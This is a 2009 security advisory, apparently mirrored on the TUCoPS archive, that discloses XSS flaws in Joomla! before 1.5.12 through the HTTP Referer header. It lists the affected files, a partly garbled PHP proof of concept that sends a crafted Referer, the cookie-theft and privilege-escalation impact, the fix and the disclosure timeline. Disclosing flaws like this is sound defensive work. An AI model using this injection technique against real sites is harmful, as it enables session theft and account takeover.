TUCoPS :: Web :: CMS / Portals :: bt-21260.htm

Joomla! < 1.5.12 Multiple XSS vulnerabilities in HTTP Headers
Joomla! < 1.5.12 Multiple XSS vulnerabilities in HTTP Headers
Joomla! < 1.5.12 Multiple XSS vulnerabilities in HTTP Headers



============================================INTERNET SECURITY AUDITORS ALERT 2009-007
- Original release date: June 30th, 2009
- Last revised:  July 2nd, 2009
- Discovered by: Juan Galiana Lara
- Severity: 6.8/10 (CVSS Base Score)
============================================
I. VULNERABILITY
-------------------------
Joomla! < 1.5.12 Multiple XSS vulnerabilities in HTTP Headers

II. BACKGROUND
-------------------------
Joomla! is an award-winning content management system (CMS), which
enables you to build Web sites and powerful online applications. Many
aspects, including its ease-of-use and extensibility, have made
Joomla! the most popular Web site software available. Best of all,
Joomla! is an open source solution that is freely available to everyone.

III. DESCRIPTION
-------------------------
Joomla! fails to sanitized user supplied input. An attacker can inject
JavaScript or DHTML code that will be executed in the context of
targeted user browser, allowing him to steal cookies. HTTP headers are
not properly parsed, concretly the HTTP_REFERER variable.

Snippet of vulnerable code:

Line 225 of file components/com_content/views/article/tmpl/form.php is
vunerable.

221 
222 
223 
224 
225 
226 
227 
228 

Other parts of code may be affected:

components/com_user/controller.php:86:    $return @$_SERVER['HTTP_REFERER'];
plugins/system/legacy/html.php:246:    echo ''. JText::_( 'BACK' )
.'';
templates/beez/html/com_content/article/form.php:186:    

IV. PROOF OF CONCEPT
-------------------------
An attacker can redirect the victim to a site with this script for
executing javascript code in the victim's browser. The PoC creates a
crafted HTTP request with malicious data in the HTTP_REFERER header.
In order to succesfully exploit it, an account with any role is
needed. For example, an user with any role can escalate privileges to
administrator.
headers[] = 'Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8';
    $this->headers[] = 'Connection: Keep-Alive';
    $this->headers[] = 'Content-type:
application/x-www-form-urlencoded;charset=UTF-8';
    $this->headers[] = 'Referer: ">$c=$cc->get('http://' . $site . $path . 
'/index.php?option=com_content&view=article&layout=form');

  /* let's execute some javascript.. }:-)*/
  echo $c;
?>

V. BUSINESS IMPACT
-------------------------
An attacker can exploit the vulnerability to inyect DHTML and
JavaScript code in the context of the web browser. This may lead in
steal the targeted user cookies and gain access to the user account
icluding administrator privileges.

VI. SYSTEMS AFFECTED
-------------------------
Joomla! versions prior and including 1.5.11 are vulnerable.

VII. SOLUTION
-------------------------
Upgrade to version 1.5.12

VIII. REFERENCES
-------------------------
http://www.joomla.org 
http://www.isecauditors.com 

IX. CREDITS
-------------------------
This vulnerability has been discovered
by Juan Galiana Lara (jgaliana (at) isecauditors (dot) com).

X. REVISION HISTORY
-------------------------
June  30, 2009: Initial release.
July  02, 2009: Last revision.

XI. DISCLOSURE TIMELINE
-------------------------
June  30, 2009: Discovered by Internet Security Auditors.
June  30, 2009: Vendor contacted. Fast response.
July  01, 2009: Joomla! publish update. Great job.
July  02, 2009: Advisory published.

XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
Internet Security Auditors accepts no responsibility for any damage
caused by the use or misuse of this information.

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH